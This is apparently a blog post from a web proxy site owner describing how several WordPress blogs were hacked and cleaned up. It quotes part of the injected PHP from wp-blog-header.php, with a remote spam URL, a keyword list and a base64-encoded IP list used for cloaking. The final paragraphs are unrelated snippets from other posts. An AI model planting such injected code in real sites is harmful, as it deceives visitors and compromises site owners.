Well as you can see, the Web Proxy Blog is back online despite the best efforts of a particularly mean set of hacks that we want to share with you to help you fix your problems and secondly to help prevent people making the same mistakes using WordPress that we did.
Firstly, this was a multiple hack across many different domains and blogs, though they all had a few things in common;
They were all run/updated from a computer that was infected with with worms, backdoors, trojans and goodness know what else. Keep your antivirus software up to date!
Secondly, they were all WordPress blogs that should have been updated. The oldest was version 2.0 and the latest was WP 2.63. We would have thought that the WordPress 2.6.3 and 2.5 installations would have been safe, but this hack is fairly new.
Finally, all the blogs were on Dreamhost. Could be a coincidence – we would be interested in hearing your comments.
The hacks manifested in a number of ways, but they all looked fine in a browser but had dozens hidden links at the bottom of each blog post. It’s only when I looked through the source code, or switched off the CSS that the links could be seen. Most of the links were real estate or lindsay lohan screensavers or something!
Another thing that was noticeable was that there were strange new files and folders in the blogs eg;
/blog/wp-includes/js/tinymce/themes/advanced/images/xp
In these directories I found files with strange filenames eg. 05417e755b378ea9a91fdbe7f71712ce. These files contained links that were appearing in the footer.
Another thing I noticed was that the wp-blog-header.php file was much larger than the original and had strange coding in it;
/* r_start */
$rurl=”http://sattan.org/feed/search.php?q=”;
$rkeys=array(”buy tramadol”,”tramadol”,”tramadol online”,”soma”,”auto insurance”,”car insurance”,”backing up files”,”car insurance quote”,”auto insurance quotes”,”auto insurance company”,”auto insurance quote”,”fioricet”,”insurance quotes”,…………………….. religion”);
$ips=unserialize(base64_decode(”YTo3OntpOjA7czoxMjoiODEuMTc3LjI2LjIwIjtpOjE7czoxMzoiNjYuMjQ5LjEzLjE1NiI7aToyO3M6MTM6IjY2LjI0OS4xNC4xNDQiO2k6MztzOjEzOiI2Ni4yNDkuMTQuMTQzIjtpOjY7czoxNDoiMjA5LjU5LjIwMS4yMzYiO2k6NztzOjEzOiI2Ni4yNDkuMTAuMTQyIjtpOjExO3M6MTE6IjcyLjI5Ljc0LjExIjt9″));
$_ip=false; if(is_array($ips)) foreach($ips as $ip) if($ip==$_SERVER['REMOTE_ADDR']){ $_ip=true; break; }
if(sizeof($_COOKIE)==0 && $_ip==false && ……………………..………..
exit;
There was also some strange coding in the template footer.php file with a 1,000 character long, Base64 string that collected spam links from www.spamreport.ru.
I also found a backdoor file, remv.php, in the root of the WordPress themes directory.
Anyway, I didn’t fancy cleaning up that mess so I decided to make a backup via ftp, delete the old files and so a completely fresh WordPress install. The only problem was that the hack seemed to have changed the folder permissions from 755 to 555, which meant that we couldn’t delete our own files!
That was easy enough to fix; setting the attributes back to their proper value, but we did notice a few files and folders that had been modified to 777 (ie read/write/execute permission) confirming our suspicion that this was a mean hack and that the best way to fix it would be to delete everything and start with a fresh installation.
The good news is that once we had done this the blogs were back to normal, with the exception of the pre WordPress 2.2 blogs that had their character set altered so that pound signs, foreign letters etc were garbled with “Ä ±” or similar. Removing these two lines from the wp-config.php fixed this;
define(’DB_CHARSET’, ‘utf8′);
define(’DB_COLLATE’, ”);
You don’t need these two lines if you are upgrading from pre WP 2.2 versions because the character sets are already built into the blog.
As a final precaution I reset the MySQL database table password and the WP admin password for good measure. We also reset the ftp password because I suspect this was a hack across so many levels that just about every one of my usernames and passwords has been compromised.
So, that’s how I spent most of my Sunday! Anyone have similar experiences, shortcuts etc. they want to share?
The idea is simple, write a blog post about us or link to us from your proxy site with the anchor text ‘Web Proxy‘ and well post a link to you from this site in a blog post.
Due to the nature of the web and the legalities, I thought its in our best interest to take down our Google Proxy and our Yahoo Proxy due to possibly copyright and trademark infringements and they arent worth losing a Google Adsense account over. With that said we have given a facelift to our 
As the title seems to suggest, I think its better if we post our proxy revenues monthly instead of you guys guessing how much we are earning along with our monthly traffic stats for all sites to make the monthly look at things a little more interesting. Hopefully you guys prefer it that was and Im sure it will be a lot easier for us just posting income and traffic stats once per month instead of having too fill up a post just to mention that our best day so far is $2.50 (which is true).
.